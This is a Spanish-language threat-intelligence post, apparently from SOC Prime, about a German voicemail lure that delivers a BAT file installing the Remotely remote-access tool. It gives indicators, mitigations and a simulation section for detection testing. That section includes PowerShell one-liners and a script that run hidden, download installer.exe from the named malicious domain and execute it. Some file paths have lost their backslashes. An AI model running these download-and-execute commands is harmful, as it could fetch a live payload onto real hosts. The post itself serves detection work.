SOC Prime Bias: Medio

06 Feb 2026 19:41
newspaper icon Censys

Trampa de Buzón de Voz: señuelo de buzón de voz en alemán conduce a acceso remoto

Author Photo
Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime linkedin icon Seguir
Trampa de Buzón de Voz: señuelo de buzón de voz en alemán conduce a acceso remoto
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

Los actores de amenazas están alojando páginas de destino de «correo de voz» en idioma alemán que atraen a los usuarios a descargar un archivo BAT. El script reproduce un señuelo de audio benigno mientras instala silenciosamente la herramienta de monitoreo remoto legitima Remotely. Una vez desplegado, el agente RMM proporciona al atacante acceso remoto persistente a través de infraestructura de C2 controlada por el atacante.

Investigación

Censys identificó 86 propiedades web comprometidas en dominios *.cadillac.ps distribuyendo el malicioso BAT. El script invoca un instalador de PowerShell alojado en remotely.billbutterworth.com, que descarga un paquete ZIP de Remotely. El archivo contiene los componentes del agente Remotely y un servicio que se instala en C:Program FilesRemotely.

Mitigación

Bloquear los dominios *.cadillac.ps y remotely.billbutterworth.com en la capa de DNS/proxy. Capacitar a los usuarios para no ejecutar archivos BAT inesperados o copiar/pegar comandos de PowerShell desde páginas web desconocidas. Implementar controles de punto final para detectar la creación del servicio Remotely y rutas de instalación sospechosas o herramientas sin firmar.

Respuesta

Alertar sobre la creación de Remotely_Service y la presencia de Remotely_Agent.exe bajo Program Files. Buscar voicemail.bat y la actividad relacionada del instalador de PowerShell. Aislar los hosts afectados, recopilar artefactos forenses y rotar/revocar cualquier credencial o token utilizado por el agente RMM.

graph TB %% Definiciones de clases classDef action fill:#99ccff %% Nodos node_content_injection[«<b>Técnica</b> – T1659 Inyección de Contenido<br/>Propiedad web comprometida entrega un enlace malicioso.»] class node_content_injection action node_initial_user_exec[«<b>Técnica</b> – T1204.001 Ejecución por el Usuario: Enlace Malicioso<br/>La víctima hace clic en un enlace malicioso a una página de destino de correo de voz comprometida.»] class node_initial_user_exec action node_cmd_shell[«<b>Técnica</b> – T1059.003 Intérprete de Comandos de Windows<br/>Archivo BAT (voicemail.bat) descargado y ejecutado.»] class node_cmd_shell action node_powershell[«<b>Técnica</b> – T1059.001 PowerShell<br/>El script Install-Remotely.ps1 instala Remotely RMM.»] class node_powershell action node_system_service[«<b>Técnica</b> – T1569 Servicios del Sistema<br/>RMM instalado como servicio de Windows (Remotely_Service).»] class node_system_service action node_masquerading[«<b>Técnica</b> – T1036 Enmascaramiento & T1036.008 Enmascarar Tipo de Archivo<br/>BAT presentado como actualización de medios; archivos ubicados en Program Files.»] class node_masquerading action node_hide_artifacts[«<b>Técnica</b> – T1564 Ocultar Artefactos<br/>Artefactos de instalación ocultos en C:\Program Files\Remotely.»] class node_hide_artifacts action node_c2[«<b>Técnica</b> – T1102.002 Comunicación Bidireccional mediante Servicio Web & T1071 Protocolo de Capa de Aplicación<br/>Comunicación HTTPS con servidor remoto.»] class node_c2 action %% Conexiones node_content_injection –>|soporta| node_initial_user_exec node_initial_user_exec –>|conduce_a| node_cmd_shell node_cmd_shell –>|ejecuta| node_powershell node_powershell –>|instala| node_system_service node_system_service –>|usa| node_masquerading node_system_service –>|usa| node_hide_artifacts node_system_service –>|establece| node_c2

Flujo de Ataque

Ejecución de Simulación

Requisito previo: Debe haberse superado la Comprobación de Telemetría y Baseline Pre‑vuelo.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para desencadenar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa de Ataque y Comandos:

    1. Entrega por Phishing: El atacante envía un correo electrónico con un adjunto de señuelo de correo de voz en alemán (HTML) que, al abrirse, redirige a la víctima a http://bannerbank.cadillac.ps/voicemail.html.
    2. Ejecución en la Página de Destino: La página de destino aloja un comando de una línea de PowerShell malicioso que descarga y ejecuta un instalador de herramienta de gestión remota (RMM).
    3. Creación de Proceso: Cuando el navegador de la víctima procesa la página, PowerShell se invoca con una línea de comandos que explícitamente incluye las dos cadenas que la regla observa.
    4. Telemetría Resultante: Windows registra el Evento ID 4688 con un CommandLine contiene ambas “página de destino temática de correo de voz” and “bannerbank.cadillac.ps”, satisfaciendo así la condición de Sigma.

    El comando exacto utilizado para la simulación:

    # Ejecución maliciosa simulada – contiene ambas cadenas de activación
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-themed landing page'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`""

  • Script de Prueba de Regresión: Un script de PowerShell autónomo que reproduce el ataque y se puede ejecutar en cualquier host de Windows con el registro requerido habilitado.

    <#
.SINOPSIS
    Simula el cebo de correo de voz alemán que activa la regla de detección Sigma.
.DESCRIPCIÓN
    Ejecuta una línea de comando de PowerShell que contiene ambas subcadenas requeridas.
#>

# Definir cadenas maliciosas
$lureText = "página de destino temática de correo de voz"
$maliciousDomain = "bannerbank.cadillac.ps"

# Construir la línea única que aparecerá en la línea de comandos
$payload = @"
Write-Host '$lureText';
Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe;
Start-Process $env:TEMPinstaller.exe
"@

# Lanzar PowerShell con la línea de comando diseñada
$psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`""
Write-Host "Lanzando comando de PowerShell malicioso..."
Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru

# Opcional: esperar unos segundos para asegurar el registro
Start-Sleep -Seconds 5

  • Comandos de Limpieza: Eliminar el instalador descargado y cualquier proceso residual.

    # Detener cualquier proceso de instalador que persista
Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force

# Eliminar el archivo temporal del instalador
$installerPath = "$env:TEMPinstaller.exe"
if (Test-Path $installerPath) {
    Remove-Item $installerPath -Force
    Write-Host "Limpieza de $installerPath"
}

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis